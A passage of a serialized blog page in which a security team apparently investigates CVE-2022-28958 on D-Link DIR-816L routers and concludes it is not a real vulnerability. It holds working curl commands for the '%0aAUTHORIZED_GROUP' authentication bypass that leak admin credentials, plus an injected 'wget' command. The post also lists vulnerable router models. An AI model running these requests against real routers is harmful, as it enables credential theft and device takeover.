114586,114588,114590,114592,114594,114596,114598,114600,114602,114604,114606,114608],{"class":1375,"line":4768},[1373,114585,4695],{"class":4636},[1373,114587,47425],{"class":1383},[1373,114589,100083],{"class":4640},[1373,114591,7035],{"class":1383},[1373,114593,183],{"class":1387},[1373,114595,100044],{"class":1391},[1373,114597,183],{"class":1387},[1373,114599,15050],{"class":1383},[1373,114601,16406],{"class":1397},[1373,114603,4883],{"class":1387},[1373,114605,112819],{"class":1391},[1373,114607,183],{"class":1387},[1373,114609,11875],{"class":1383},[1373,114611,114612],{"class":1375,"line":4792},[1373,114613,9613],{"class":1383},[1373,114615,114616,114618,114620,114622,114624,114626,114628,114630,114632,114634],{"class":1375,"line":4798},[1373,114617,4727],{"class":1383},[1373,114619,100300],{"class":4640},[1373,114621,5417],{"class":1397},[1373,114623,4656],{"class":1383},[1373,114625,100083],{"class":4640},[1373,114627,7035],{"class":1383},[1373,114629,183],{"class":1387},[1373,114631,85021],{"class":1391},[1373,114633,183],{"class":1387},[1373,114635,34699],{"class":1383},[1373,114637,114638,114640,114642,114644,114646,114648],{"class":1375,"line":4806},[1373,114639,9773],{"class":4636},[1373,114641,47425],{"class":1383},[1373,114643,100300],{"class":4640},[1373,114645,15677],{"class":1397},[1373,114647,16579],{"class":1387},[1373,114649,11875],{"class":1383},[1373,114651,114652],{"class":1375,"line":4817},[1373,114653,9788],{"class":1383},[1373,114655,114656,114658,114660,114662,114664,114666,114668,114670,114672],{"class":1375,"line":4825},[1373,114657,112872],{"class":7297},[1373,114659,1384],{"class":1383},[1373,114661,183],{"class":1387},[1373,114663,112879],{"class":1391},[1373,114665,183],{"class":1387},[1373,114667,5437],{"class":1383},[1373,114669,4656],{"class":1383},[1373,114671,85021],{"class":4640},[1373,114673,4680],{"class":1383},[1373,114675,114676,114678,114680,114682,114684,114686],{"class":1375,"line":4835},[1373,114677,112894],{"class":7
297},[1373,114679,1384],{"class":1383},[1373,114681,183],{"class":1387},[1373,114683,112901],{"class":1391},[1373,114685,183],{"class":1387},[1373,114687,4680],{"class":1383},[1373,114689,114690,114692,114694,114696,114698,114700,114702],{"class":1375,"line":4843},[1373,114691,47435],{"class":1383},[1373,114693,112912],{"class":4640},[1373,114695,5417],{"class":1397},[1373,114697,4883],{"class":1387},[1373,114699,112919],{"class":1391},[1373,114701,183],{"class":1387},[1373,114703,4912],{"class":1383},[1373,114705,114706,114708,114710,114712,114714,114716],{"class":1375,"line":4849},[1373,114707,47435],{"class":1383},[1373,114709,112930],{"class":4640},[1373,114711,5417],{"class":1397},[1373,114713,16579],{"class":1387},[1373,114715,39663],{"class":1383},[1373,114717,108366],{"class":4640},[1373,114719,114720],{"class":1375,"line":4877},[1373,114721,9861],{"class":1383},[1373,114723,114724,114726],{"class":1375,"line":4915},[1373,114725,28032],{"class":1383},[1373,114727,47181],{"class":4640},[1373,114729,114730,114732,114734,114736,114738,114740,114742,114744,114746],{"class":1375,"line":4931},[1373,114731,7643],{"class":4636},[1373,114733,112955],{"class":7297},[1373,114735,1384],{"class":1383},[1373,114737,112960],{"class":7297},[1373,114739,1384],{"class":1383},[1373,114741,183],{"class":1387},[1373,114743,112967],{"class":1391},[1373,114745,183],{"class":1387},[1373,114747,1413],{"class":1383},[1373,114749,114750],{"class":1375,"line":4947},[1373,114751,1855],{"class":1383},[1373,114753,114754],{"class":1375,"line":4952},[1373,114755,113736],{"class":1397},[18,114757,114758],{},"The bypass is useful because it gives an attacker access to most of the router's PHP logic. 
As we’ve stated, the bypass has been assigned five CVE at this point, and it's typically associated with a credential leak (which also happens to work on the DIR-816L):",[100588,114760,114761],{},[1354,114762,114764],{"className":31740,"code":114763,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2019-10891$ curl http:\u002F\u002F192.168.0.1:80\u002Fgetcfg.php -d \"SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1\"\n",[886,114765,114766],{"__ignoreMap":219},[1373,114767,114768,114771,114773,114775,114777,114779,114782],{"class":1375,"line":1376},[1373,114769,114770],{"class":2206},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2019-10891$",[1373,114772,2222],{"class":1391},[1373,114774,113018],{"class":1391},[1373,114776,87473],{"class":2209},[1373,114778,4883],{"class":1387},[1373,114780,114781],{"class":1391},"SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1",[1373,114783,19057],{"class":1387},[1354,114785,114787],{"className":56326,"code":114786,"language":56328,"meta":219,"style":219},"\u003C?xml version=\"1.0\" encoding=\"utf-8\"?>\n\u003Cpostxml>\n\u003Cmodule>\n    \u003Cservice>DEVICE.ACCOUNT\u003C\u002Fservice>\n    \u003Cdevice>\n        \u003Cgw_name>wget http:\u002F\u002F192.168.0.164\u002Ftest\u003C\u002Fgw_name>\n        \n        \u003Caccount>\n            \u003Cseqno>1\u003C\u002Fseqno>\n            \u003Cmax>2\u003C\u002Fmax>\n            \u003Ccount>1\u003C\u002Fcount>\n            \u003Centry>\n                \u003Cuid>USR-\u003C\u002Fuid>\n                \u003Cname>Admin\u003C\u002Fname>\n                \u003Cusrid>\u003C\u002Fusrid>\n                \u003Cpassword>labpass1\u003C\u002Fpassword>\n                \u003Cgroup>0\u003C\u002Fgroup>\n                \u003Cdescription>\u003C\u002Fdescription>\n            \u003C\u002Fentry>\n        \u003C\u002Faccount>\n        \u003Cgroup>\n            \u003Cseqno>\u003C\u002Fseqno>\n            \u003Cmax>\u003C\u002Fmax>\n       
     \u003Ccount>0\u003C\u002Fcount>\n        \u003C\u002Fgroup>\n        \u003Csession>\n            \u003Ccaptcha>0\u003C\u002Fcaptcha>\n            \u003Cdummy>\u003C\u002Fdummy>\n            \u003Ctimeout>180\u003C\u002Ftimeout>\n            \u003Cmaxsession>128\u003C\u002Fmaxsession>\n            \u003Cmaxauthorized>16\u003C\u002Fmaxauthorized>\n        \u003C\u002Fsession>\n    \u003C\u002Fdevice>\n\u003C\u002Fmodule>\n\u003C\u002Fpostxml>\n",[886,114788,114789,114817,114825,114833,114850,114859,114876,114880,114888,114905,114922,114939,114947,114964,114981,114994,115010,115027,115039,115047,115055,115063,115075,115087,115103,115111,115119,115135,115148,115165,115183,115200,115208,115216,115224],{"__ignoreMap":219},[1373,114790,114791,114793,114795,114797,114799,114801,114803,114805,114807,114809,114811,114813,114815],{"class":1375,"line":1376},[1373,114792,2323],{"class":1383},[1373,114794,56328],{"class":6300},[1373,114796,45880],{"class":8252},[1373,114798,5417],{"class":1383},[1373,114800,183],{"class":1387},[1373,114802,84878],{"class":1391},[1373,114804,183],{"class":1387},[1373,114806,84883],{"class":8252},[1373,114808,5417],{"class":1383},[1373,114810,183],{"class":1387},[1373,114812,48993],{"class":1391},[1373,114814,183],{"class":1387},[1373,114816,113736],{"class":1383},[1373,114818,114819,114821,114823],{"class":1375,"line":220},[1373,114820,11852],{"class":1383},[1373,114822,113743],{"class":6300},[1373,114824,6765],{"class":1383},[1373,114826,114827,114829,114831],{"class":1375,"line":1266},[1373,114828,11852],{"class":1383},[1373,114830,49176],{"class":6300},[1373,114832,6765],{"class":1383},[1373,114834,114835,114837,114839,114841,114844,114846,114848],{"class":1375,"line":1852},[1373,114836,8246],{"class":1383},[1373,114838,99380],{"class":6300},[1373,114840,5384],{"class":1383},[1373,114842,114843],{"class":4640},"DEVICE.ACCOUNT",[1373,114845,46627],{"class":1383},[1373,114847,99380],{"class":6300},[1373,114849,6765],{"class":1383},[1373,1148
51,114852,114854,114857],{"class":1375,"line":4692},[1373,114853,8246],{"class":1383},[1373,114855,114856],{"class":6300},"device",[1373,114858,6765],{"class":1383},[1373,114860,114861,114863,114865,114867,114870,114872,114874],{"class":1375,"line":4724},[1373,114862,46606],{"class":1383},[1373,114864,114441],{"class":6300},[1373,114866,5384],{"class":1383},[1373,114868,114869],{"class":4640},"wget http:\u002F\u002F192.168.0.164\u002Ftest",[1373,114871,46627],{"class":1383},[1373,114873,114441],{"class":6300},[1373,114875,6765],{"class":1383},[1373,114877,114878],{"class":1375,"line":4756},[1373,114879,51244],{"class":4640},[1373,114881,114882,114884,114886],{"class":1375,"line":4768},[1373,114883,46606],{"class":1383},[1373,114885,50018],{"class":6300},[1373,114887,6765],{"class":1383},[1373,114889,114890,114892,114895,114897,114899,114901,114903],{"class":1375,"line":4792},[1373,114891,46655],{"class":1383},[1373,114893,114894],{"class":6300},"seqno",[1373,114896,5384],{"class":1383},[1373,114898,467],{"class":4640},[1373,114900,46627],{"class":1383},[1373,114902,114894],{"class":6300},[1373,114904,6765],{"class":1383},[1373,114906,114907,114909,114912,114914,114916,114918,114920],{"class":1375,"line":4798},[1373,114908,46655],{"class":1383},[1373,114910,114911],{"class":6300},"max",[1373,114913,5384],{"class":1383},[1373,114915,353],{"class":4640},[1373,114917,46627],{"class":1383},[1373,114919,114911],{"class":6300},[1373,114921,6765],{"class":1383},[1373,114923,114924,114926,114929,114931,114933,114935,114937],{"class":1375,"line":4806},[1373,114925,46655],{"class":1383},[1373,114927,114928],{"class":6300},"count",[1373,114930,5384],{"class":1383},[1373,114932,467],{"class":4640},[1373,114934,46627],{"class":1383},[1373,114936,114928],{"class":6300},[1373,114938,6765],{"class":1383},[1373,114940,114941,114943,114945],{"class":1375,"line":4817},[1373,114942,46655],{"class":1383},[1373,114944,38540],{"class":6300},[1373,114946,6765],{"class":1383},[1373,114948,11
4949,114951,114953,114955,114958,114960,114962],{"class":1375,"line":4825},[1373,114950,46674],{"class":1383},[1373,114952,75926],{"class":6300},[1373,114954,5384],{"class":1383},[1373,114956,114957],{"class":4640},"USR-",[1373,114959,46627],{"class":1383},[1373,114961,75926],{"class":6300},[1373,114963,6765],{"class":1383},[1373,114965,114966,114968,114970,114972,114975,114977,114979],{"class":1375,"line":4835},[1373,114967,46674],{"class":1383},[1373,114969,30774],{"class":6300},[1373,114971,5384],{"class":1383},[1373,114973,114974],{"class":4640},"Admin",[1373,114976,46627],{"class":1383},[1373,114978,30774],{"class":6300},[1373,114980,6765],{"class":1383},[1373,114982,114983,114985,114988,114990,114992],{"class":1375,"line":4843},[1373,114984,46674],{"class":1383},[1373,114986,114987],{"class":6300},"usrid",[1373,114989,49120],{"class":1383},[1373,114991,114987],{"class":6300},[1373,114993,6765],{"class":1383},[1373,114995,114996,114998,115000,115002,115004,115006,115008],{"class":1375,"line":4849},[1373,114997,46674],{"class":1383},[1373,114999,86310],{"class":6300},[1373,115001,5384],{"class":1383},[1373,115003,89173],{"class":4640},[1373,115005,46627],{"class":1383},[1373,115007,86310],{"class":6300},[1373,115009,6765],{"class":1383},[1373,115011,115012,115014,115017,115019,115021,115023,115025],{"class":1375,"line":4877},[1373,115013,46674],{"class":1383},[1373,115015,115016],{"class":6300},"group",[1373,115018,5384],{"class":1383},[1373,115020,445],{"class":4640},[1373,115022,46627],{"class":1383},[1373,115024,115016],{"class":6300},[1373,115026,6765],{"class":1383},[1373,115028,115029,115031,115033,115035,115037],{"class":1375,"line":4915},[1373,115030,46674],{"class":1383},[1373,115032,79737],{"class":6300},[1373,115034,49120],{"class":1383},[1373,115036,79737],{"class":6300},[1373,115038,6765],{"class":1383},[1373,115040,115041,115043,115045],{"class":1375,"line":4931},[1373,115042,85070],{"class":1383},[1373,115044,38540],{"class":6300},[1373,115046,676
5],{"class":1383},[1373,115048,115049,115051,115053],{"class":1375,"line":4947},[1373,115050,85087],{"class":1383},[1373,115052,50018],{"class":6300},[1373,115054,6765],{"class":1383},[1373,115056,115057,115059,115061],{"class":1375,"line":4952},[1373,115058,46606],{"class":1383},[1373,115060,115016],{"class":6300},[1373,115062,6765],{"class":1383},[1373,115064,115065,115067,115069,115071,115073],{"class":1375,"line":6776},[1373,115066,46655],{"class":1383},[1373,115068,114894],{"class":6300},[1373,115070,49120],{"class":1383},[1373,115072,114894],{"class":6300},[1373,115074,6765],{"class":1383},[1373,115076,115077,115079,115081,115083,115085],{"class":1375,"line":6781},[1373,115078,46655],{"class":1383},[1373,115080,114911],{"class":6300},[1373,115082,49120],{"class":1383},[1373,115084,114911],{"class":6300},[1373,115086,6765],{"class":1383},[1373,115088,115089,115091,115093,115095,115097,115099,115101],{"class":1375,"line":7524},[1373,115090,46655],{"class":1383},[1373,115092,114928],{"class":6300},[1373,115094,5384],{"class":1383},[1373,115096,445],{"class":4640},[1373,115098,46627],{"class":1383},[1373,115100,114928],{"class":6300},[1373,115102,6765],{"class":1383},[1373,115104,115105,115107,115109],{"class":1375,"line":7530},[1373,115106,85087],{"class":1383},[1373,115108,115016],{"class":6300},[1373,115110,6765],{"class":1383},[1373,115112,115113,115115,115117],{"class":1375,"line":7546},[1373,115114,46606],{"class":1383},[1373,115116,4664],{"class":6300},[1373,115118,6765],{"class":1383},[1373,115120,115121,115123,115125,115127,115129,115131,115133],{"class":1375,"line":7571},[1373,115122,46655],{"class":1383},[1373,115124,104608],{"class":6300},[1373,115126,5384],{"class":1383},[1373,115128,445],{"class":4640},[1373,115130,46627],{"class":1383},[1373,115132,104608],{"class":6300},[1373,115134,6765],{"class":1383},[1373,115136,115137,115139,115142,115144,115146],{"class":1375,"line":7598},[1373,115138,46655],{"class":1383},[1373,115140,115141],{"class":6300},
"dummy",[1373,115143,49120],{"class":1383},[1373,115145,115141],{"class":6300},[1373,115147,6765],{"class":1383},[1373,115149,115150,115152,115154,115156,115159,115161,115163],{"class":1375,"line":7615},[1373,115151,46655],{"class":1383},[1373,115153,86559],{"class":6300},[1373,115155,5384],{"class":1383},[1373,115157,115158],{"class":4640},"180",[1373,115160,46627],{"class":1383},[1373,115162,86559],{"class":6300},[1373,115164,6765],{"class":1383},[1373,115166,115167,115169,115172,115174,115177,115179,115181],{"class":1375,"line":7635},[1373,115168,46655],{"class":1383},[1373,115170,115171],{"class":6300},"maxsession",[1373,115173,5384],{"class":1383},[1373,115175,115176],{"class":4640},"128",[1373,115178,46627],{"class":1383},[1373,115180,115171],{"class":6300},[1373,115182,6765],{"class":1383},[1373,115184,115185,115187,115190,115192,115194,115196,115198],{"class":1375,"line":7640},[1373,115186,46655],{"class":1383},[1373,115188,115189],{"class":6300},"maxauthorized",[1373,115191,5384],{"class":1383},[1373,115193,39254],{"class":4640},[1373,115195,46627],{"class":1383},[1373,115197,115189],{"class":6300},[1373,115199,6765],{"class":1383},[1373,115201,115202,115204,115206],{"class":1375,"line":7648},[1373,115203,85087],{"class":1383},[1373,115205,4664],{"class":6300},[1373,115207,6765],{"class":1383},[1373,115209,115210,115212,115214],{"class":1375,"line":7672},[1373,115211,56557],{"class":1383},[1373,115213,114856],{"class":6300},[1373,115215,6765],{"class":1383},[1373,115217,115218,115220,115222],{"class":1375,"line":7688},[1373,115219,46627],{"class":1383},[1373,115221,49176],{"class":6300},[1373,115223,6765],{"class":1383},[1373,115225,115226,115228,115230],{"class":1375,"line":7709},[1373,115227,46627],{"class":1383},[1373,115229,113743],{"class":6300},[1373,115231,6765],{"class":1383},[18,115233,115234,115235,115238],{},"Credential leaks on routers are useful for attackers that manipulate router configurations or upload malicious firmware, but for our 
purposes, the authentication bypass can be used to grab detailed version information from the ",[886,115236,115237],{},"\u002FDevInfo.txt"," endpoint. Like this:",[100588,115240,115241],{},[1354,115242,115244],{"className":31740,"code":115243,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2019-10891$ curl http:\u002F\u002F192.168.0.1\u002FDevInfo.txt?vuln=check%0aAUTHORIZED_GROUP=1270\nFirmware External Version: V2.06\nFirmware Internal Version: f4jc\nModel Name: DIR-816L\nHardware Version:\nWLAN Domain: CA\nKernel: 2.6.30.9\nLanguage: en\nGraphcal Authentication: Disable\nLAN MAC: f8:e9:03:c1:81:b4\nWAN MAC: f8:e9:03:c1:81:b7\nWLAN MAC: f8:e9:03:c1:81:b4\n",[886,115245,115246,115258,115272,115284,115295,115302,115313,115321,115329,115340,115351,115361],{"__ignoreMap":219},[1373,115247,115248,115250,115252,115255],{"class":1375,"line":1376},[1373,115249,114770],{"class":2206},[1373,115251,2222],{"class":1391},[1373,115253,115254],{"class":1391}," http:\u002F\u002F192.168.0.1\u002FDevInfo.txt?vuln=check%0aAUTHORIZED_GROUP=",[1373,115256,115257],{"class":5467},"1270\n",[1373,115259,115260,115263,115266,115269],{"class":1375,"line":220},[1373,115261,115262],{"class":2206},"Firmware",[1373,115264,115265],{"class":1391}," External",[1373,115267,115268],{"class":1391}," Version:",[1373,115270,115271],{"class":1391}," V2.06\n",[1373,115273,115274,115276,115279,115281],{"class":1375,"line":1266},[1373,115275,115262],{"class":2206},[1373,115277,115278],{"class":1391}," Internal",[1373,115280,115268],{"class":1391},[1373,115282,115283],{"class":1391}," f4jc\n",[1373,115285,115286,115289,115292],{"class":1375,"line":1852},[1373,115287,115288],{"class":2206},"Model",[1373,115290,115291],{"class":1391}," Name:",[1373,115293,115294],{"class":1391}," DIR-816L\n",[1373,115296,115297,115299],{"class":1375,"line":4692},[1373,115298,68462],{"class":2206},[1373,115300,115301],{"class":1391}," 
Version:\n",[1373,115303,115304,115307,115310],{"class":1375,"line":4724},[1373,115305,115306],{"class":2206},"WLAN",[1373,115308,115309],{"class":1391}," Domain:",[1373,115311,115312],{"class":1391}," CA\n",[1373,115314,115315,115318],{"class":1375,"line":4756},[1373,115316,115317],{"class":2206},"Kernel:",[1373,115319,115320],{"class":5467}," 2.6.30.9\n",[1373,115322,115323,115326],{"class":1375,"line":4768},[1373,115324,115325],{"class":2206},"Language:",[1373,115327,115328],{"class":1391}," en\n",[1373,115330,115331,115334,115337],{"class":1375,"line":4792},[1373,115332,115333],{"class":2206},"Graphcal",[1373,115335,115336],{"class":1391}," Authentication:",[1373,115338,115339],{"class":1391}," Disable\n",[1373,115341,115342,115345,115348],{"class":1375,"line":4798},[1373,115343,115344],{"class":2206},"LAN",[1373,115346,115347],{"class":1391}," MAC:",[1373,115349,115350],{"class":1391}," f8:e9:03:c1:81:b4\n",[1373,115352,115353,115356,115358],{"class":1375,"line":4806},[1373,115354,115355],{"class":2206},"WAN",[1373,115357,115347],{"class":1391},[1373,115359,115360],{"class":1391}," f8:e9:03:c1:81:b7\n",[1373,115362,115363,115365,115367],{"class":1375,"line":4817},[1373,115364,115306],{"class":2206},[1373,115366,115347],{"class":1391},[1373,115368,115350],{"class":1391},[18,115370,115371,115372,115375,115376,115378,115379,4606],{},"Using the bypass also allows us to read ",[886,115373,115374],{},"\u002Fmydlink\u002Fget_WanSetting.asp"," which contains the “exploited” hostname. 
For example, below you can see the ",[886,115377,1553],{}," command from our exploitation attempt of ",[886,115380,112717],{},[100588,115382,115383],{},[1354,115384,115386],{"className":31740,"code":115385,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2019-10891$ curl http:\u002F\u002F192.168.0.1\u002Fmydlink\u002Fget_WanSetting.asp -d \"test=test%0aAUTHORIZED_GROUP=1\"\n",[886,115387,115388],{"__ignoreMap":219},[1373,115389,115390,115392,115394,115397,115399,115401,115404],{"class":1375,"line":1376},[1373,115391,114770],{"class":2206},[1373,115393,2222],{"class":1391},[1373,115395,115396],{"class":1391}," http:\u002F\u002F192.168.0.1\u002Fmydlink\u002Fget_WanSetting.asp",[1373,115398,87473],{"class":2209},[1373,115400,4883],{"class":1387},[1373,115402,115403],{"class":1391},"test=test%0aAUTHORIZED_GROUP=1",[1373,115405,19057],{"class":1387},[1354,115407,115409],{"className":56326,"code":115408,"language":56328,"meta":219,"style":219},"\u003Cwansetting>\n\u003Cconfig.wan_ip_mode>1\u003C\u002Fconfig.wan_ip_mode>\n\u003Cconfig.wan_dhcp_gw_name>& wget http:\u002F\u002F192.168.0.164\u002Ftest & \u003C\u002Fconfig.wan_dhcp_gw_name>\n\u003Cmac_clone>f8:e9:03:c1:81:b7\u003C\u002Fmac_clone>\n... 
truncated ...\n",[886,115410,115411,115420,115437,115459,115477],{"__ignoreMap":219},[1373,115412,115413,115415,115418],{"class":1375,"line":1376},[1373,115414,11852],{"class":1383},[1373,115416,115417],{"class":6300},"wansetting",[1373,115419,6765],{"class":1383},[1373,115421,115422,115424,115427,115429,115431,115433,115435],{"class":1375,"line":220},[1373,115423,11852],{"class":1383},[1373,115425,115426],{"class":6300},"config.wan_ip_mode",[1373,115428,5384],{"class":1383},[1373,115430,467],{"class":4640},[1373,115432,46627],{"class":1383},[1373,115434,115426],{"class":6300},[1373,115436,6765],{"class":1383},[1373,115438,115439,115441,115444,115446,115448,115451,115453,115455,115457],{"class":1375,"line":1266},[1373,115440,11852],{"class":1383},[1373,115442,115443],{"class":6300},"config.wan_dhcp_gw_name",[1373,115445,5384],{"class":1383},[1373,115447,7218],{"class":28571},[1373,115449,115450],{"class":4640}," wget http:\u002F\u002F192.168.0.164\u002Ftest ",[1373,115452,7218],{"class":28571},[1373,115454,49129],{"class":1383},[1373,115456,115443],{"class":6300},[1373,115458,6765],{"class":1383},[1373,115460,115461,115463,115466,115468,115471,115473,115475],{"class":1375,"line":1852},[1373,115462,11852],{"class":1383},[1373,115464,115465],{"class":6300},"mac_clone",[1373,115467,5384],{"class":1383},[1373,115469,115470],{"class":4640},"f8:e9:03:c1:81:b7",[1373,115472,46627],{"class":1383},[1373,115474,115465],{"class":6300},[1373,115476,6765],{"class":1383},[1373,115478,115479],{"class":1375,"line":4692},[1373,115480,115481],{"class":4640},"... truncated ...\n",[18,115483,115484,115485,115487,115488,115490,115491,115494,115495,115497],{},"In theory, if these devices were under attack using the ",[886,115486,112717],{}," vulnerability, then we’d be able to find artifacts of exploitation on internet-facing devices by querying ",[886,115489,115374],{},". We did just that. 
Using a list of 6000+ routers from Shodan, we found ",[295,115492,115493],{},"zero"," routers with evidence of ",[886,115496,112717],{}," exploitation attempts. Which means, to us, that it’s highly unlikely that anyone has attempted to use the vulnerability, as described in the CVE description, in the wild.",[1920,115499,115501],{"id":115500},"consulting-greynoise","Consulting Greynoise",[18,115503,115504,115505,115507],{},"Finally, we consulted Greynoise. They can give us insight into whether ",[886,115506,112717],{}," exploitation is hitting any of their honeypots.",[18,115509,115510],{},[68,115511],{":width":10862,"alt":112689,"src":115512},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fgreynoise_shareport.png",[18,115514,115515,115516,10515,115518,115523],{},"From the screenshot above, you can see that Greynoise isn’t seeing CVE-2022-28958 exploitation either. Greynoise does have an existing tag for the ",[886,115517,113046],{},[47,115519,115522],{"href":115520,"rel":115521},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fd-link-trendnet-getcfg-auth-bypass-attempt?days=30",[51],"authentication bypass",". As mentioned earlier, this is typically associated with a credential leak, and it does have some activity over the last 30 days.",[18,115525,115526],{},[68,115527],{":width":10862,"alt":112689,"src":115528},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fgreynoise_getcfg.png",[18,115530,115531,115532,115534],{},"But, as previously mentioned, ",[886,115533,113046],{}," is in no way related to CVE-2022-28958 other than the original researcher posting an erroneous proof of concept.",[1920,115536,88770],{"id":88769},[18,115538,115539],{},"In summary, this blog established the following:",[22,115541,115542,115545,115548,115551,115554],{},[25,115543,115544],{},"The original researcher's proof of concept for CVE-2022-28958 never worked.",[25,115546,115547],{},"Moobot copied the researcher's proof of concept and added additional errors. 
Their exploit never worked.",[25,115549,115550],{},"CVE-2022-28958 isn't real. We tested firmware versions 2.03b1, 2.06b1 (the reportedly vulnerable version) and 2.06b9 and found no evidence the vulnerability exists. The original researcher provided no evidence either.",[25,115552,115553],{},"Internet-facing D-Link DIR-816L did not contain artifacts that would indicate they were exploited by CVE-2022-28958.",[25,115555,115556,115557,115559],{},"GreyNoise has not seen ",[886,115558,112717],{}," HTTP requests hit their honeypots.",[18,115561,115562],{},"We conclude that CVE-2022-28958 is not a real vulnerability and at-scale exploitation has never occurred. The vulnerability should not be listed by MITRE, and it should not be in the CISA Known Exploited Vulnerabilities Catalog. We filed a dispute with MITRE and shared our findings with CISA in October 2022.",[18,115564,115565],{},[68,115566],{":width":10862,"alt":112689,"src":115567},"\u002Fblog\u002Fmoobot-uses-fake-vulnerability\u002Fdispute.png",[1920,115569,115571],{"id":115570},"addendum","Addendum",[18,115573,115574,115575,115578],{},"VulnCheck has found the following D-Link models to be vulnerable to the ",[886,115576,115577],{},"%0aAUTHORIZED_GROUP"," bypass (aka CVE-2022-28956, CVE-2020-15894, CVE-2020-9376, CVE-2019-17506, and 
CVE-2018-7034):",[22,115580,115581,115584,115587,115590,115593,115596,115599,115602,115605,115608,115611,115614,115617,115619,115622,115625,115628,115631,115634,115637,115640,115643,115646,115649,115652],{},[25,115582,115583],{},"DIR-300",[25,115585,115586],{},"DIR-600",[25,115588,115589],{},"DIR-605L",[25,115591,115592],{},"DIR-610",[25,115594,115595],{},"DIR-610N+",[25,115597,115598],{},"DIR-615",[25,115600,115601],{},"DIR-629",[25,115603,115604],{},"DIR-645",[25,115606,115607],{},"DIR-685",[25,115609,115610],{},"DIR-803",[25,115612,115613],{},"DIR-806",[25,115615,115616],{},"DIR-815",[25,115618,112623],{},[25,115620,115621],{},"DIR-817LW",[25,115623,115624],{},"DIR-818L",[25,115626,115627],{},"DIR-818LW",[25,115629,115630],{},"DIR-822",[25,115632,115633],{},"DIR-845L",[25,115635,115636],{},"DIR-850L",[25,115638,115639],{},"DIR-860L",[25,115641,115642],{},"DIR-865L",[25,115644,115645],{},"DIR-868L",[25,115647,115648],{},"DSL-2890AL",[25,115650,115651],{},"GO-RT-AC750",[25,115653,115654],{},"WBR-2200",[2901,115656,115657],{},"
",{"title":219,"searchDepth":220,"depth":220,"links":115659},[],"An investigation into CVE-2022-28958 finds the vulnerability doesn't actually 
exist.",{"slug":115662,"category":115663},"moobot-uses-fake-vulnerability","updates","\u002Fblog\u002Fmoobot-uses-fake-vulnerability",{"title":112566,"description":115660},"blog\u002Fmoobot-uses-fake-vulnerability","cLiY7LMEwyefm5PeS05Ec1AZMw9l3oSra5bdmzLez9M",{"id":115669,"title":81971,"articles":115670,"authors":115674,"body":115676,"date":62051,"description":118377,"extension":234,"image":7,"link":7,"meta":118378,"navigation":237,"path":118380,"seo":118381,"series":7,"stem":118382,"subtype":7,"tags":118383,"__hash__":118384},"blog\u002Fblog\u002Fxiongmai-iot-exploitation.md",[115671],{"title":115672,"source":3494,"link":115673,"date":62073},"Risky Biz News: CryWiper hits Russian courts and mayor offices in data-wiping attacks","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-crywiper-hits-russian",[115675],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":115677,"toc":118370},[115678,115692,115697,115700,115751,115770,116166,116187,116190,116193,116199,116202,116204,116210,116225,116231,116234,116240,116243,116249,116252,116261,116267,116270,116276,116279,116290,116296,116322,116325,116329,116356,116367,116668,116675,116697,116700,116703,116706,116712,116731,116754,116760,116773,116779,116785,116793,116796,116801,117096,117099,117103,117115,117118,117124,117137,117148,117462,117484,117487,117493,117499,117503,117522,117531,117540,117543,117549,117557,117563,117572,117576,117589,117598,118038,118051,118057,118060,118065,118350,118357,118361,118364,118367],[18,115679,115680,115681,115686,115687,59],{},"There are a number of reasons ",[47,115682,115685],{"href":115683,"rel":115684},"https:\u002F\u002Fwww.xiongmaitech.com\u002Fen\u002Findex.php",[51],"Xiongmai"," devices are interesting targets. The first reason is there are a lot of them on the internet. 
Around ",[47,115688,115691],{"href":115689,"rel":115690},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=%28services.http.response.body%3A%22NetSuveillanceWebCookie%22+or+services.http.response.html_title%3A%22NetSurveillance+WEB%22%29+and+%28services.http.response.headers.server%3A%22uc-httpd%22+or+not+services.http.response.headers.server%3A%22*%22%29",[51],"200,000",[18,115693,115694],{},[68,115695],{":width":10862,"alt":112689,"src":115696},"\u002Fblog\u002Fxiongmai-iot-exploitation\u002Fcensys_results.png",[18,115698,115699],{},"The second reason is these devices have been affected by a handful of high or critical vulnerabilities:",[22,115701,115702,115709,115716,115724,115731,115738,115744],{},[25,115703,115704,115708],{},[47,115705,81767],{"href":115706,"rel":115707},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2017-7577",[51],": Unauthenticated HTTP request path traversal resulting in arbitrary file and credential disclosure.",[25,115710,115711,115715],{},[47,115712,81776],{"href":115713,"rel":115714},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2018-10088",[51],": Unauthenticated and remote HTTP login request stack-based buffer overflow.",[25,115717,115718,115723],{},[47,115719,115722],{"href":115720,"rel":115721},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2020-22253",[51],"CVE-2020-22253",": Port 9530 debug interface that allowed an unauthenticated attacker to open a telnet.",[25,115725,115726,115730],{},[47,115727,106686],{"href":115728,"rel":115729},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2021-41506",[51],": Port 9527 debug interface that allows an attacker using default credentials to execute arbitrary operating system commands (technically speaking, the wording of the CVE could include CVE-2020-22253 \u002F port 
